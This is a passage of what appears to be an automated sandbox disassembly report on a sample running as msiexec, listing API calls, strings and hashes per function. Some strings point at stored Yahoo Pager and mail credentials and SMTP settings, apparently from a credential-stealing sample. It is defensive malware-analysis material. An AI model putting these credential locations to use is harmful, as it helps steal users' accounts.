                                                                      • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                      • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                      • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy
                                                                      • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                      • API String ID: 3510742995-3170954634
                                                                      • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                      • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                      • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                      • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy$memset
                                                                      • String ID: winWrite1$winWrite2
                                                                      • API String ID: 438689982-3457389245
                                                                      • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                      • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                      • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                      • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpymemset
                                                                      • String ID: winRead
                                                                      • API String ID: 1297977491-2759563040
                                                                      • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                      • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                      • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                      • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0044955B
                                                                      • memset.MSVCRT ref: 0044956B
                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpymemset
                                                                      • String ID: gj
                                                                      • API String ID: 1297977491-4203073231
                                                                      • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                      • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                      • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                      • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                      APIs
                                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                      • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                      • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                      • GetLastError.KERNEL32 ref: 0040C1CA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                      • String ID:
                                                                      • API String ID: 1189762176-0
                                                                      • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                      • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                      • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                      • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 004090C2
                                                                      • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                      • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                      • String ID:
                                                                      • API String ID: 4247780290-0
                                                                      • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                      • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                      • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                      • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                      APIs
                                                                      • _strcmpi.MSVCRT ref: 0040E134
                                                                      • _strcmpi.MSVCRT ref: 0040E14D
                                                                      • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _strcmpi$_mbscpy
                                                                      • String ID: smtp
                                                                      • API String ID: 2625860049-60245459
                                                                      • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                      • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                      • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                      • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040C28C
                                                                      • SetFocus.USER32(?,?), ref: 0040C314
                                                                        • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: FocusMessagePostmemset
                                                                      • String ID: S_@$l
                                                                      • API String ID: 3436799508-4018740455
                                                                      • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                      • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                      • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                      • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                      APIs
                                                                      • memset.MSVCRT ref: 004092C0
                                                                      • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                      • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                      Strings
                                                                      • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileString_mbscpymemset
                                                                      • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                      • API String ID: 408644273-3424043681
                                                                      • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                      • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                      • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                      • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _mbscpy
                                                                      • String ID: C^@$X$ini
                                                                      • API String ID: 714388716-917056472
                                                                      • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                      • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                      • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                      • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                      APIs
                                                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                      • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                      • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                      • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                      • String ID: MS Sans Serif
                                                                      • API String ID: 3492281209-168460110
                                                                      • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                      • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                      • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                      • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName_strcmpimemset
                                                                      • String ID: edit
                                                                      • API String ID: 275601554-2167791130
                                                                      • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                      • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                      • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                      • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: strlen$_mbscat
                                                                      • String ID: 3CD
                                                                      • API String ID: 3951308622-1938365332
                                                                      • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                      • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                      • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                      • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                      APIs
                                                                        • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@$memset
                                                                      • String ID:
                                                                      • API String ID: 1860491036-0
                                                                      • Opcode ID: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                      • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                      • Opcode Fuzzy Hash: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                      • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040D2C2
                                                                      • memset.MSVCRT ref: 0040D2D8
                                                                      • memset.MSVCRT ref: 0040D2EA
                                                                      • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                      • memset.MSVCRT ref: 0040D319
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$memcpy
                                                                      • String ID:
                                                                      • API String ID: 368790112-0
                                                                      • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                      • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                      • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                      • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                      APIs
                                                                      Strings
                                                                      • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                      • too many SQL variables, xrefs: 0042C6FD
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset
                                                                      • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                      • API String ID: 2221118986-515162456
                                                                      • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                      • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                      • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                      • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                      APIs
                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                      • memset.MSVCRT ref: 004026AD
                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                        • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                        • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                      • LocalFree.KERNEL32(?), ref: 004027A6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                      • String ID:
                                                                      • API String ID: 3503910906-0
                                                                      • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                      • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                      • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                      • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                      APIs
                                                                        • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                                        • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                      • strlen.MSVCRT ref: 0040B60B
                                                                      • atoi.MSVCRT(?), ref: 0040B619
                                                                      • _mbsicmp.MSVCRT ref: 0040B66C
                                                                      • _mbsicmp.MSVCRT ref: 0040B67F
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                      • String ID:
                                                                      • API String ID: 4107816708-0
                                                                      • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                      • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                      • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                      • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                      • _gmtime64.MSVCRT ref: 00411437
                                                                      • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                      • strftime.MSVCRT ref: 00411476
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                      • String ID:
                                                                      • API String ID: 1886415126-0
                                                                      • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                      • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                      • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                      • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: strlen
                                                                      • String ID: >$>$>
                                                                      • API String ID: 39653677-3911187716
                                                                      • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                      • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                      • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                      • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                      APIs
                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                      • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy
                                                                      • String ID: @
                                                                      • API String ID: 3510742995-2766056989
                                                                      • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                      • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                      • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                      • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _strcmpi
                                                                      • String ID: C@$mail.identity
                                                                      • API String ID: 1439213657-721921413
                                                                      • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                      • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                      • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                      • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00444573
                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: QueryValuememset
                                                                      • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                      • API String ID: 3363972335-1703613266
                                                                      • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                      • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                      • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                      • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00406640
                                                                        • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                      • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                      • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy$memset$memcmp
                                                                      • String ID: Ul@
                                                                      • API String ID: 270934217-715280498
                                                                      • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                      • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                      • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                      • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                      APIs
                                                                        • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                      Strings
